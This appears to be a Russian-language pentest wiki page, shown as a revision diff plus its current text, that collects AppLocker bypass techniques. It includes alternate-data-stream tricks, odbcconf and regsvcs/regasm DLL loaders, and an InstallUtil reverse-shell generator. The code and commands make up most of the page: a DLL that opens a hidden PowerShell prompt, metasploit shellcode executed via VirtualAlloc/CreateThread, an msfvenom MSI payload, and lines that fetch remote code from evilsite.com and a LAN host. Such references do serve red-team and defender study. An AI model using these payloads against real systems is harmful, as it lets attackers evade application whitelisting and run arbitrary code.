Applocker — различия между версиями
Drakylar (обсуждение | вклад) м (→Обход AppLocker) |
Drakylar (обсуждение | вклад) м (→control.exe) |
||
(не показано 7 промежуточных версий этого же участника) | |||
Строка 81: | Строка 81: | ||
Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его: | Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его: | ||
+ | |||
+ | Варианты записи в альтернативный канал: | ||
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
type test.exe > C:\logs:test.exe | type test.exe > C:\logs:test.exe | ||
+ | extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | ||
+ | esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o | ||
+ | powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}" | ||
+ | curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe | ||
+ | cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat | ||
+ | makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Запуск созданного .exe: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | # type test.exe > C:\logs:test.exe | ||
wmic process call create '"C:\logs:test.exe"' | wmic process call create '"C:\logs:test.exe"' | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Можно попробовать воспользоваться записью в альтернативный канал следующих файлов: | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | C:\Windows\System32\AppLocker\AppCache.dat | ||
+ | C:\Windows\System32\AppLocker\AppCache.dat.LOG1 | ||
+ | C:\Windows\System32\AppLocker\AppCache.dat.LOG2 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == odbcconf.exe == | ||
+ | |||
+ | === Запуск DLL === | ||
+ | |||
+ | Исходный код: | ||
+ | <syntaxhighlight lang="csharp" line="1" enclose="div" style="overflow-x:scroll; height: 300px;" > | ||
+ | //odbcconf.exe /F file.rsp | ||
+ | |||
+ | using System; | ||
+ | using System.Runtime.InteropServices; | ||
+ | using RGiesecke.DllExport; | ||
+ | using System.Collections.ObjectModel; | ||
+ | using System.Management.Automation; | ||
+ | using System.Management.Automation.Runspaces; | ||
+ | using System.Text; | ||
+ | |||
+ | public class Test | ||
+ | { | ||
+ | |||
+ | [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)] | ||
+ | public static bool DllRegisterServer() | ||
+ | { | ||
+ | while (true) | ||
+ | { | ||
+ | AllocConsole(); | ||
+ | IntPtr defaultStdout = new IntPtr(7); | ||
+ | IntPtr currentStdout = GetStdHandle(StdOutputHandle); | ||
+ | Console.Write("PS >"); | ||
+ | string x = Console.ReadLine(); | ||
+ | try | ||
+ | { | ||
+ | Console.WriteLine(RunPSCommand(x)); | ||
+ | } | ||
+ | catch (Exception e) | ||
+ | { | ||
+ | Console.WriteLine(e.Message); | ||
+ | } | ||
+ | } | ||
+ | return true; | ||
+ | } | ||
+ | //Based on Jared Atkinson's And Justin Warner's Work | ||
+ | public static string RunPSCommand(string cmd) | ||
+ | { | ||
+ | //Init stuff | ||
+ | Runspace runspace = RunspaceFactory.CreateRunspace(); | ||
+ | runspace.Open(); | ||
+ | RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); | ||
+ | Pipeline pipeline = runspace.CreatePipeline(); | ||
+ | |||
+ | //Add commands | ||
+ | pipeline.Commands.AddScript(cmd); | ||
+ | |||
+ | //Prep PS for string output and invoke | ||
+ | pipeline.Commands.Add("Out-String"); | ||
+ | Collection<PSObject> results = pipeline.Invoke(); | ||
+ | runspace.Close(); | ||
+ | |||
+ | //Convert records to strings | ||
+ | StringBuilder stringBuilder = new StringBuilder(); | ||
+ | foreach (PSObject obj in results) | ||
+ | { | ||
+ | stringBuilder.Append(obj); | ||
+ | } | ||
+ | return stringBuilder.ToString().Trim(); | ||
+ | } | ||
+ | |||
+ | public static void RunPSFile(string script) | ||
+ | { | ||
+ | PowerShell ps = PowerShell.Create(); | ||
+ | ps.AddScript(script).Invoke(); | ||
+ | } | ||
+ | |||
+ | private const UInt32 StdOutputHandle = 0xFFFFFFF5; | ||
+ | [DllImport("kernel32.dll")] | ||
+ | private static extern IntPtr GetStdHandle(UInt32 nStdHandle); | ||
+ | [DllImport("kernel32.dll")] | ||
+ | private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle); | ||
+ | [DllImport("kernel32")] | ||
+ | static extern bool AllocConsole(); | ||
+ | |||
+ | } | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Запуск DLL: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"} | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | === Запуск RSP -> DLL === | ||
+ | |||
+ | Тот же исходный код DLL, помещенный в ту же директорию, где будет расположен payload.rsp: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | REGSVR odbcconf.dll | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Запуск RSP-файла (DLL в той же директории): | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | odbcconf.exe /F payload.rsp | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == msiexec == | ||
+ | |||
+ | Создание msi: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Запуск MSI: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | msiexec /z C:\Tools\Dll1.dll | ||
+ | msiexec /quiet /i cmd.msi | ||
+ | msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Запуск DLL (код схож с Regsvr32): | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | # Вызывает DLLRegisterServer (для удаления библиотеки из системы) | ||
+ | msiexec /z C:\Tools\Dll1.dll | ||
+ | |||
+ | # Вызывает DLLRegisterServer (для добавления библиотеки в систему) | ||
+ | msiexec /y C:\Tools\Dll1.dll | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == verclsid.exe == | ||
+ | |||
+ | Пример запуска: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | verclsid /S /C {00000001-0000-0000-0000-0000FEEDACDC} | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | SID - CLASS ID файла, уникальный идентификатор COM-обьекта. | ||
+ | |||
+ | |||
+ | == hh.exe (Compiled HTML) == | ||
+ | |||
+ | Файл Out-CHM.ps1: https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1 | ||
+ | |||
+ | Генерация: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | Out-CHM -Payload "calc.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Запуск: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | hh.exe doc.chm | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Также инструкция как самостоятельно собрать CHM-проект: https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7 | ||
+ | |||
+ | == control.exe == | ||
+ | |||
+ | Исходный код DLL: | ||
+ | <syntaxhighlight lang="C++" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | #include <stdio.h> | ||
+ | #include <Windows.h> | ||
+ | |||
+ | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ | ||
+ | if (ul_reason_for_call == DLL_PROCESS_ATTACH) { | ||
+ | system("C:\\windows\\system32\\calc.exe"); | ||
+ | } | ||
+ | return 0; | ||
+ | } | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Запуск: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | control.exe c:\windows\tasks\file.txt:evil.dll | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == Presentationhost.exe == | ||
+ | |||
+ | Возможно создать приложение .xbap и запустить его командой: | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | Presentationhost.exe file:///tmp/poc.xbap | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Подробнее о создании .xbap: https://medium.com/tsscyber/applocker-bypass-presentationhost-exe-8c87b2354cd4 | ||
+ | |||
+ | == Regsvcs.exe / Regasm == | ||
+ | |||
+ | Генерируем ключ (для подписи потребуется, но не обязательно): | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | sn -k key.snk | ||
+ | |||
+ | # Или так | ||
+ | |||
+ | $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' | ||
+ | $Content = [System.Convert]::FromBase64String($key) | ||
+ | Set-Content key.snk -Value $Content -Encoding Byte | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Создаем файл regsvcs.cs: | ||
+ | <syntaxhighlight lang="csharp" line="1" enclose="div" style="overflow-x:scroll;height:300px;" > | ||
+ | using System; | ||
+ | using System.EnterpriseServices; | ||
+ | using System.Runtime.InteropServices; | ||
+ | |||
+ | /* | ||
+ | |||
+ | Author: Casey Smith, Twitter: @subTee | ||
+ | License: BSD 3-Clause | ||
+ | |||
+ | Create Your Strong Name Key -> key.snk | ||
+ | |||
+ | $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' | ||
+ | $Content = [System.Convert]::FromBase64String($key) | ||
+ | Set-Content key.snk -Value $Content -Encoding Byte | ||
+ | |||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs | ||
+ | |||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll | ||
+ | [OR] | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll | ||
+ | //Executes UnRegisterClass If you don't have permissions | ||
+ | |||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll | ||
+ | //This calls the UnregisterClass Method | ||
+ | |||
+ | */ | ||
+ | namespace regsvcser | ||
+ | { | ||
+ | |||
+ | public class Bypass : ServicedComponent | ||
+ | { | ||
+ | public Bypass() { Console.WriteLine("I am a basic COM Object"); } | ||
+ | |||
+ | [ComRegisterFunction] //This executes if registration is successful | ||
+ | public static void RegisterClass ( string key ) | ||
+ | { | ||
+ | Console.WriteLine("I shouldn't really execute"); | ||
+ | Shellcode.Exec(); | ||
+ | } | ||
+ | |||
+ | [ComUnregisterFunction] //This executes if registration fails | ||
+ | public static void UnRegisterClass ( string key ) | ||
+ | { | ||
+ | Console.WriteLine("I shouldn't really execute either."); | ||
+ | Shellcode.Exec(); | ||
+ | } | ||
+ | } | ||
+ | |||
+ | public class Shellcode | ||
+ | { | ||
+ | public static void Exec() | ||
+ | { | ||
+ | // native function's compiled code | ||
+ | // generated with metasploit | ||
+ | // executes calc.exe | ||
+ | byte[] shellcode = new byte[193] { | ||
+ | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, | ||
+ | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, | ||
+ | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, | ||
+ | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, | ||
+ | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, | ||
+ | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, | ||
+ | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, | ||
+ | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, | ||
+ | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, | ||
+ | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, | ||
+ | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, | ||
+ | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, | ||
+ | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 }; | ||
+ | |||
+ | |||
+ | |||
+ | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, | ||
+ | MEM_COMMIT, PAGE_EXECUTE_READWRITE); | ||
+ | Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); | ||
+ | IntPtr hThread = IntPtr.Zero; | ||
+ | UInt32 threadId = 0; | ||
+ | // prepare data | ||
+ | |||
+ | |||
+ | IntPtr pinfo = IntPtr.Zero; | ||
+ | |||
+ | // execute native code | ||
+ | |||
+ | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); | ||
+ | WaitForSingleObject(hThread, 0xFFFFFFFF); | ||
+ | return; | ||
+ | } | ||
+ | |||
+ | private static UInt32 MEM_COMMIT = 0x1000; | ||
+ | |||
+ | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; | ||
+ | |||
+ | [DllImport("kernel32")] | ||
+ | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, | ||
+ | UInt32 size, UInt32 flAllocationType, UInt32 flProtect); | ||
+ | |||
+ | |||
+ | [DllImport("kernel32")] | ||
+ | private static extern IntPtr CreateThread( | ||
+ | |||
+ | UInt32 lpThreadAttributes, | ||
+ | UInt32 dwStackSize, | ||
+ | UInt32 lpStartAddress, | ||
+ | IntPtr param, | ||
+ | UInt32 dwCreationFlags, | ||
+ | ref UInt32 lpThreadId | ||
+ | |||
+ | ); | ||
+ | |||
+ | [DllImport("kernel32")] | ||
+ | private static extern UInt32 WaitForSingleObject( | ||
+ | |||
+ | IntPtr hHandle, | ||
+ | UInt32 dwMilliseconds | ||
+ | ); | ||
+ | |||
+ | |||
+ | } | ||
+ | |||
+ | } | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Второй вариант кода (попроще): | ||
+ | <syntaxhighlight lang="csharp" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | using System; | ||
+ | using System.EnterpriseServices; | ||
+ | using System.Runtime.InteropServices; | ||
+ | using System.Management.Automation; | ||
+ | namespace regsvcser | ||
+ | { | ||
+ | |||
+ | public class Bypass : ServicedComponent | ||
+ | { | ||
+ | public Bypass() { Console.WriteLine("I am a basic COM Object"); } | ||
+ | |||
+ | [ComUnregisterFunction] //This executes if registration fails | ||
+ | public static void UnRegisterClass ( string key ) | ||
+ | { | ||
+ | PowerShell ps = PowerShell.Create(); | ||
+ | ps.AddCommand("Invoke-Expression"); | ||
+ | ps.AddArgument("payload"); | ||
+ | ps.Invoke(); | ||
+ | } | ||
+ | } | ||
+ | |||
+ | } | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | Компиляция: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | * Опция /U запускает класс UnRegisterClass. | ||
+ | |||
+ | * Отсутствие опции /U запускает класс RegisterClass (или UnRegisterClass если нет прав). | ||
+ | |||
+ | |||
+ | Запуск: | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll | ||
+ | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Строка 107: | Строка 495: | ||
== InstallUtil == | == InstallUtil == | ||
− | + | Для запуска PowerSherll см. [[amsi]] | |
+ | |||
+ | Также можно воспользоваться утилитой: https://github.com/khr0x40sh/WhiteListEvasion | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost 192.168.68.104 --lport 443 | ||
+ | |||
+ | # компилируем | ||
+ | csc.exe temp.cs | ||
+ | |||
+ | # Запускаем | ||
+ | .\InstallUtil.exe /logfile= /LogToConsole=false /U temp.exe | ||
+ | </syntaxhighlight> | ||
== regsvr32.exe == | == regsvr32.exe == | ||
Строка 456: | Строка 856: | ||
= Ссылки = | = Ссылки = | ||
+ | |||
+ | == Статьи == | ||
+ | |||
+ | [https://0xsp.com/offensive/red-ops-techniques/handy-techniques-to-bypass-environment-restrictions 0xsp.com] | ||
+ | |||
+ | [https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ pentestlab.blog] | ||
+ | |||
+ | [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html evi1cg.me] | ||
+ | |||
+ | [https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1218-signed-binary-proxy-execution/untitled-3 dmcxblue.gitbook.io] |
Текущая версия на 11:04, 17 марта 2022
Applocker - функция управления приложениями и политиками по запуску программного обеспечения в Windows.
Позволяет управлять:
- Исполняемые файлы
- EXE
- COM
- Скрипты
- JS
- PS1
- VBS
- CMD
- BAT
- Установочные файлы
- MST
- MSI
- MSP
- Библиотеки
- DLL
- OCX
- Упакованные приложения
- APPX
Содержание
- 1 Общее
- 2 Обход AppLocker
- 2.1 Альтернативный канал
- 2.2 odbcconf.exe
- 2.3 msiexec
- 2.4 verclsid.exe
- 2.5 hh.exe (Compiled HTML)
- 2.6 control.exe
- 2.7 Presentationhost.exe
- 2.8 Regsvcs.exe / Regasm
- 2.9 Интерпретаторы
- 2.10 Макросы ворда
- 2.11 Небезопасные политики
- 2.12 InstallUtil
- 2.13 regsvr32.exe
- 2.14 Microsoft.Workflow.Compiler.exe
- 2.15 msbuild.exe
- 2.16 cmstp.exe
- 2.17 Windows Script Host
- 2.18 wscript.exe
- 2.19 cscript.exe
- 2.20 WMIC + XLS
- 3 Ссылки
Общее
Получение политики (все юзеры)
Get-ApplockerPolicy -effective
Получение политики (все группы текущего пользователя)
$a = Get-ApplockerPolicy -effective
$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
$f = 0;
$v = $y.UserOrGroupSid.value;
Foreach ($z in $g){
if (($z.Value -eq $u) -or ($z.Value -eq $v)){
$f= 1;
};
};
if ($f -eq 1){
Write-Output $y.PathConditions;
Write-Output $y.Action;
}
}}
Однострочник
$a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};
Обход AppLocker
Альтернативный канал
Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:
Варианты записи в альтернативный канал:
type test.exe > C:\logs:test.exe
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Запуск созданного .exe:
# type test.exe > C:\logs:test.exe
wmic process call create '"C:\logs:test.exe"'
Можно попробовать воспользоваться записью в альтернативный канал следующих файлов:
C:\Windows\System32\AppLocker\AppCache.dat
C:\Windows\System32\AppLocker\AppCache.dat.LOG1
C:\Windows\System32\AppLocker\AppCache.dat.LOG2
odbcconf.exe
Запуск DLL
Исходный код:
//odbcconf.exe /F file.rsp
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static bool DllRegisterServer()
{
while (true)
{
AllocConsole();
IntPtr defaultStdout = new IntPtr(7);
IntPtr currentStdout = GetStdHandle(StdOutputHandle);
Console.Write("PS >");
string x = Console.ReadLine();
try
{
Console.WriteLine(RunPSCommand(x));
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
return true;
}
//Based on Jared Atkinson's And Justin Warner's Work
public static string RunPSCommand(string cmd)
{
//Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
//Add commands
pipeline.Commands.AddScript(cmd);
//Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
//Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
public static void RunPSFile(string script)
{
PowerShell ps = PowerShell.Create();
ps.AddScript(script).Invoke();
}
private const UInt32 StdOutputHandle = 0xFFFFFFF5;
[DllImport("kernel32.dll")]
private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
[DllImport("kernel32.dll")]
private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
[DllImport("kernel32")]
static extern bool AllocConsole();
}
Запуск DLL:
odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}
Запуск RSP -> DLL
Тот же исходный код DLL, помещенный в ту же директорию, где будет расположен payload.rsp:
REGSVR odbcconf.dll
Запуск RSP-файла (DLL в той же директории):
odbcconf.exe /F payload.rsp
msiexec
Создание msi:
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
Запуск MSI:
msiexec /z C:\Tools\Dll1.dll
msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png
Запуск DLL (код схож с Regsvr32):
# Вызывает DLLRegisterServer (для удаления библиотеки из системы)
msiexec /z C:\Tools\Dll1.dll
# Вызывает DLLRegisterServer (для добавления библиотеки в систему)
msiexec /y C:\Tools\Dll1.dll
verclsid.exe
Пример запуска:
verclsid /S /C {00000001-0000-0000-0000-0000FEEDACDC}
SID - CLASS ID файла, уникальный идентификатор COM-обьекта.
hh.exe (Compiled HTML)
Файл Out-CHM.ps1: https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
Генерация:
Out-CHM -Payload "calc.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Запуск:
hh.exe doc.chm
Также инструкция как самостоятельно собрать CHM-проект: https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7
control.exe
Исходный код DLL:
#include <stdio.h>
#include <Windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("C:\\windows\\system32\\calc.exe");
}
return 0;
}
Запуск:
control.exe c:\windows\tasks\file.txt:evil.dll
Presentationhost.exe
Возможно создать приложение .xbap и запустить его командой:
Presentationhost.exe file:///tmp/poc.xbap
Подробнее о создании .xbap: https://medium.com/tsscyber/applocker-bypass-presentationhost-exe-8c87b2354cd4
Regsvcs.exe / Regasm
Генерируем ключ (для подписи потребуется, но не обязательно):
sn -k key.snk
# Или так
